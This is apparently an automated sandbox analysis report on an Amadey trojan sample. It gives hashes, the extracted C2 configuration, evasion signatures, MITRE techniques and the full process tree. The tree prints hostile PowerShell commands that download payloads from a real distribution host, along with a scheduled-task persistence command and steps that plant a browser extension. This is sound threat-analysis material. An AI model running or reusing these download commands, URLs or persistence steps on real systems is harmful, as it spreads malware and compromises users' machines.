amadey | fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31

Analysis

max time kernel
143s
max time network
133s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
19-05-2024 16:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
Size

1.8MB
MD5

a41ed1469e0fc7bb00ffba36cf6fb862
SHA1

3479ae464278d392aa4555524ad7a40a5a3c2df2
SHA256

fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31
SHA512

9ad1009e85efef1277fafc774f36fa71be1bad4d4bebc2944a59db076592f040427fd1edcaef653159d8b9d07461ca19b4fdc1e8dbd2964980972a5c503ef21d
SSDEEP

49152:6O95X9+LbTNyR9nuU9UdwaxwgNtA6erpkJayQfw6x:DFOTIRzULwgodQgfLx

Score

10^/10

amadey c767c0 discovery evasion execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002

Extracted

Family

amadey

Version

4.20

Botnet

c767c0

http://5.42.96.7

Attributes

install_dir
7af68cdb52
install_file
axplons.exe
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
url_paths
/zamo7h/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

axplons.exeaxplons.exefd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exeaxplons.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

24 2148 powershell.exe
25 4616 powershell.exe
26 4616 powershell.exe
28 2192 powershell.exe
29 2192 powershell.exe
Downloads MZ/PE file

flow	pid	process
24	2148	powershell.exe
25	4616	powershell.exe
26	4616	powershell.exe
28	2192	powershell.exe
29	2192	powershell.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

axplons.exeaxplons.exefd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exeaxplons.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe

Executes dropped EXE 11 IoCs

Processes:

axplons.exeNewoff.exetoolspub1.exelumma1234.exevpn-1002.exei0.exei0.tmpaxplons.exeNewoff.exeNewoff.exeaxplons.exe

pid	process
4560	axplons.exe
4992	Newoff.exe
1412	toolspub1.exe
836	lumma1234.exe
232	vpn-1002.exe
4872	i0.exe
764	i0.tmp
4808	axplons.exe
3164	Newoff.exe
2564	Newoff.exe
2824	axplons.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exeaxplons.exeaxplons.exeaxplons.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine	fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
Key opened	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine	axplons.exe

Loads dropped DLL 1 IoCs

Processes:

vpn-1002.exe

pid process

232 vpn-1002.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

30 checkip.amazonaws.com
4 checkip.amazonaws.com
Drops file in System32 directory 1 IoCs

Processes:

i0.tmp

description ioc process

File created C:\Windows\system32\shlwapi_p.dll i0.tmp
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exeaxplons.exeaxplons.exeaxplons.exe

pid process

2012 fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
4560 axplons.exe
4808 axplons.exe
2824 axplons.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

lumma1234.exe

description pid process target process

PID 836 set thread context of 2384 836 lumma1234.exe RegAsm.exe

pid	process
232	vpn-1002.exe

flow	ioc
30	checkip.amazonaws.com
4	checkip.amazonaws.com

description	ioc	process
File created	C:\Windows\system32\shlwapi_p.dll	i0.tmp

description	pid	process	target process
PID 836 set thread context of 2384	836	lumma1234.exe	RegAsm.exe

Drops file in Program Files directory 14 IoCs

Processes:

i0.tmp

description	ioc	process
File created	C:\Program Files\Google\Chrome\Application\chrome.exe.manifest	i0.tmp
File created	C:\Program Files (x86)\Microsoft\Edge\Application\dlls\dlls.manifest	i0.tmp
File created	C:\Program Files\Online Security\unins000.dat	i0.tmp
File created	C:\Program Files\Google\Chrome\Application\Extensions\security.crx	i0.tmp
File created	C:\Program Files (x86)\Microsoft\Edge\Application\dlls\Shlwapi.dll	i0.tmp
File created	C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\security.crx	i0.tmp
File opened for modification	C:\Program Files\Online Security\unins000.dat	i0.tmp
File created	C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest	i0.tmp
File created	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.manifest	i0.tmp
File created	C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\updates.xml	i0.tmp
File opened for modification	C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest	i0.tmp
File created	C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll	i0.tmp
File created	C:\Program Files\Google\Chrome\Application\Extensions\updates.xml	i0.tmp
File created	C:\Program Files\Online Security\is-UG4QN.tmp	i0.tmp

Drops file in Windows directory 3 IoCs

Processes:

fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exechrome.exe

description	ioc	process
File created	C:\Windows\Tasks\axplons.job	fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir2656_128953709\extension.zip	chrome.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2148 powershell.exe
4616 powershell.exe
2192 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5040 1412 WerFault.exe toolspub1.exe

pid	process
2148	powershell.exe
4616	powershell.exe
2192	powershell.exe

pid	pid_target	process	target process
5040	1412	WerFault.exe	toolspub1.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

toolspub1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4732 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1268 taskkill.exe
1696 taskkill.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 31 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
4732	schtasks.exe

pid	process
1268	taskkill.exe
1696	taskkill.exe

description	flow	ioc
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exeaxplons.exepowershell.exepowershell.exepowershell.exeaxplons.exeaxplons.exe

pid	process
2012	fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
2012	fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
4560	axplons.exe
4560	axplons.exe
2148	powershell.exe
2148	powershell.exe
4616	powershell.exe
4616	powershell.exe
2192	powershell.exe
2192	powershell.exe
4808	axplons.exe
4808	axplons.exe
2824	axplons.exe
2824	axplons.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	1268	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

i0.tmp

pid process

764 i0.tmp

pid	process
764	i0.tmp

Suspicious use of WriteProcessMemory 59 IoCs

Processes:

fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exeaxplons.exeNewoff.exelumma1234.exevpn-1002.execmd.exei0.exei0.tmpcmd.exechrome.exe

description	pid	process	target process
PID 2012 wrote to memory of 4560	2012	fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe	axplons.exe
PID 2012 wrote to memory of 4560	2012	fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe	axplons.exe
PID 2012 wrote to memory of 4560	2012	fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe	axplons.exe
PID 4560 wrote to memory of 4992	4560	axplons.exe	Newoff.exe
PID 4560 wrote to memory of 4992	4560	axplons.exe	Newoff.exe
PID 4560 wrote to memory of 4992	4560	axplons.exe	Newoff.exe
PID 4992 wrote to memory of 4732	4992	Newoff.exe	schtasks.exe
PID 4992 wrote to memory of 4732	4992	Newoff.exe	schtasks.exe
PID 4992 wrote to memory of 4732	4992	Newoff.exe	schtasks.exe
PID 4992 wrote to memory of 1412	4992	Newoff.exe	toolspub1.exe
PID 4992 wrote to memory of 1412	4992	Newoff.exe	toolspub1.exe
PID 4992 wrote to memory of 1412	4992	Newoff.exe	toolspub1.exe
PID 4560 wrote to memory of 836	4560	axplons.exe	lumma1234.exe
PID 4560 wrote to memory of 836	4560	axplons.exe	lumma1234.exe
PID 4560 wrote to memory of 836	4560	axplons.exe	lumma1234.exe
PID 836 wrote to memory of 2384	836	lumma1234.exe	RegAsm.exe
PID 836 wrote to memory of 2384	836	lumma1234.exe	RegAsm.exe
PID 836 wrote to memory of 2384	836	lumma1234.exe	RegAsm.exe
PID 836 wrote to memory of 2384	836	lumma1234.exe	RegAsm.exe
PID 836 wrote to memory of 2384	836	lumma1234.exe	RegAsm.exe
PID 836 wrote to memory of 2384	836	lumma1234.exe	RegAsm.exe
PID 836 wrote to memory of 2384	836	lumma1234.exe	RegAsm.exe
PID 836 wrote to memory of 2384	836	lumma1234.exe	RegAsm.exe
PID 836 wrote to memory of 2384	836	lumma1234.exe	RegAsm.exe
PID 4992 wrote to memory of 232	4992	Newoff.exe	vpn-1002.exe
PID 4992 wrote to memory of 232	4992	Newoff.exe	vpn-1002.exe
PID 4992 wrote to memory of 232	4992	Newoff.exe	vpn-1002.exe
PID 232 wrote to memory of 1924	232	vpn-1002.exe	cmd.exe
PID 232 wrote to memory of 1924	232	vpn-1002.exe	cmd.exe
PID 232 wrote to memory of 1924	232	vpn-1002.exe	cmd.exe
PID 1924 wrote to memory of 2148	1924	cmd.exe	powershell.exe
PID 1924 wrote to memory of 2148	1924	cmd.exe	powershell.exe
PID 1924 wrote to memory of 2148	1924	cmd.exe	powershell.exe
PID 1924 wrote to memory of 4616	1924	cmd.exe	powershell.exe
PID 1924 wrote to memory of 4616	1924	cmd.exe	powershell.exe
PID 1924 wrote to memory of 4616	1924	cmd.exe	powershell.exe
PID 1924 wrote to memory of 4872	1924	cmd.exe	i0.exe
PID 1924 wrote to memory of 4872	1924	cmd.exe	i0.exe
PID 1924 wrote to memory of 4872	1924	cmd.exe	i0.exe
PID 1924 wrote to memory of 2192	1924	cmd.exe	powershell.exe
PID 1924 wrote to memory of 2192	1924	cmd.exe	powershell.exe
PID 1924 wrote to memory of 2192	1924	cmd.exe	powershell.exe
PID 4872 wrote to memory of 764	4872	i0.exe	i0.tmp
PID 4872 wrote to memory of 764	4872	i0.exe	i0.tmp
PID 4872 wrote to memory of 764	4872	i0.exe	i0.tmp
PID 764 wrote to memory of 4080	764	i0.tmp	cmd.exe
PID 764 wrote to memory of 4080	764	i0.tmp	cmd.exe
PID 4080 wrote to memory of 2656	4080	cmd.exe	chrome.exe
PID 4080 wrote to memory of 2656	4080	cmd.exe	chrome.exe
PID 2656 wrote to memory of 2168	2656	chrome.exe	chrome.exe
PID 2656 wrote to memory of 2168	2656	chrome.exe	chrome.exe
PID 764 wrote to memory of 1876	764	i0.tmp	cmd.exe
PID 764 wrote to memory of 1876	764	i0.tmp	cmd.exe
PID 764 wrote to memory of 3376	764	i0.tmp	cmd.exe
PID 764 wrote to memory of 3376	764	i0.tmp	cmd.exe
PID 764 wrote to memory of 1696	764	i0.tmp	taskkill.exe
PID 764 wrote to memory of 1696	764	i0.tmp	taskkill.exe
PID 764 wrote to memory of 1268	764	i0.tmp	taskkill.exe
PID 764 wrote to memory of 1268	764	i0.tmp	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
"C:\Users\Admin\AppData\Local\Temp\fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2012

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4560

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
"C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4992

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F
4⤵
- Creates scheduled task(s)
PID:4732

C:\Users\Admin\AppData\Local\Temp\1000270001\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\1000270001\toolspub1.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:1412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 384
5⤵
- Program crash
PID:5040

C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
"C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:232

C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nst5035.tmp\abc.bat"
5⤵
- Suspicious use of WriteProcessMemory
PID:1924

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4616

C:\Users\Admin\AppData\Local\Temp\i0.exe
i0.exe /verysilent /sub=1000
6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4872

C:\Users\Admin\AppData\Local\Temp\is-JLORN.tmp\i0.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JLORN.tmp\i0.tmp" /SL5="$901AA,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=1000
7⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:764

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx > "C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\~execwithresult.txt""
8⤵
- Suspicious use of WriteProcessMemory
PID:4080

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx
9⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ff86081cc40,0x7ff86081cc4c,0x7ff86081cc58
10⤵
PID:2168

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\njktgx.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\~execwithresult.txt""
8⤵
PID:1876

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\wetqzt > "C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\~execwithresult.txt""
8⤵
PID:3376

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /f /im "msedge.exe"
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /f /im "chrome.exe"
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1268

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192

C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
"C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:836

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:2384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1412 -ip 1412
1⤵
PID:2572

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4808

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
1⤵
- Executes dropped EXE
PID:3164

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
1⤵
- Executes dropped EXE
PID:2564

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2824

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
c0636f2d138baca01dbb2eedb99bf3d5

SHA1
3b927899db0f3e2cb510782592887dc02fc3e400

SHA256
10973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a

SHA512
0187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
e50484a2db5325bb8033144393d5b216

SHA1
1a04ae7b55ec49730e3e53b523940e65c8b87001

SHA256
6863adb5c2f87aff9b612c627b2d78ba67e8c7f650812d2a2e0abf32e0de3430

SHA512
0bad2d0c0949b365458a886c2886c44a1138cfbf9cbbd5125886a7a11580dbff4c8f6f00c783f3e5994f3db437b20e33aa462facf157e03967bb03d97796c000

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
0bc9d7c2c803dec65abeed489db09e62

SHA1
ace2ea73fa62ec224f84733d3359e818d448d17a

SHA256
3caf550be89ecd069f886989215423a4a81231a18635cdf75fc3076ee59ebc89

SHA512
9794b6adbd316ddb9081fe9142c731f8c8d378e8e36f157abeb7f5b397bf0ad838114ee8d2732e79c378e33e9e3abc315129daa731165277f4dc8347a94106b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
Filesize
418KB

MD5
0099a99f5ffb3c3ae78af0084136fab3

SHA1
0205a065728a9ec1133e8a372b1e3864df776e8c

SHA256
919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

SHA512
5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
Filesize
518KB

MD5
c4ffab152141150528716daa608d5b92

SHA1
a48d3aecc0e986b6c4369b9d4cfffb08b53aed89

SHA256
c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475

SHA512
a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000270001\toolspub1.exe
Filesize
210KB

MD5
10e9648c3c9c3f6985e5962cdc795f21

SHA1
a23f89036f056b967dfb6d8c8632d4e3d56d2258

SHA256
0d3928bbe9db17a0bd0ce3454c39362b60f26c1613cc8d488f69f81fbf2868c1

SHA512
6c597f9278fce6d03d3aabaace82e2c6dd3afac291b484c525aeb264f9d6a6041d415ca60bac4569ca4dcd605c741f56757323fe3e20dc6978adb703ec158d6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
Filesize
49KB

MD5
ccb630a81a660920182d1c74b8db7519

SHA1
7bd1f7855722a82621b30dd96a651f22f7b0bf8a

SHA256
a73dc535324b73ab10c09ed2b965fc1b504a828f6059ddf99e26b9c03642a346

SHA512
8fd536da55b8e2a514bcea9cbe62492af1168b7713ea5955f3af8fcfa8060eac4ee079022380ab5ba5f9f7610a595981ed2f472fb14d569ac82057c50a785811

Download Submit
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
Filesize
1.8MB

MD5
a41ed1469e0fc7bb00ffba36cf6fb862

SHA1
3479ae464278d392aa4555524ad7a40a5a3c2df2

SHA256
fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31

SHA512
9ad1009e85efef1277fafc774f36fa71be1bad4d4bebc2944a59db076592f040427fd1edcaef653159d8b9d07461ca19b4fdc1e8dbd2964980972a5c503ef21d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2kczhrn1.fsm.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\i0.exe
Filesize
3.5MB

MD5
b80362872ea704846e892f16aab924c3

SHA1
222b36b97d7978929c6fd2d3b1ff8bd8504a5a33

SHA256
d42c001c3cf58d276a5bf52eb8a56158343676a18952b94d6de8c1e8127bf91e

SHA512
beadabff22437031fd2df2748527f60d67249abefa1afdedef233ce56ad54cb675835c849ecaa8248e0e2e597b13754b0c0611504818e700a59b4727fb4bc7a5

Download Submit
